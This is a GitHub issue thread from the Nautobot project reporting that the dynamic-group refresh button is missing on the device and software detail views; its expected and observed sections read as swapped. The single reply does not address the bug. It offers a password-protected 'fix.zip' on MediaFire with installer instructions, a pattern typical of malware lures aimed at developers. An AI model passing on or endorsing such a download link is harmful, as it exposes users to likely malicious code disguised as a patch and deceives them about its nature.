### ISSUE TITLE
Missing DynamicGroup content (refresh dynamic group message) on DeviceDetailView and SoftwareDetailView

### ISSUE THREAD

**Issue by HanlinMiao** [nautobot/nautobot#6146]
### Environment
* Nautobot version (Docker tag too if applicable): v2.3
* Python version:
* Database platform, version:
* Middleware(s):

### Steps to Reproduce
1. Go to any dynamic-group associable objects' detail view other than device and software
2. See the dynamic-group membership refresh button https://github.com/nautobot/nautobot/blob/develop/nautobot/core/templates/generic/object_retrieve.html#L218-L224
3. Go to DeviceDetailView and SoftwareDetailView

### Expected Behavior
This content is missing in device_retrieve.html and software_*_retrieve.html

### Observed Behavior
This content is present in device_retrieve.html and software_*_retrieve.html

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
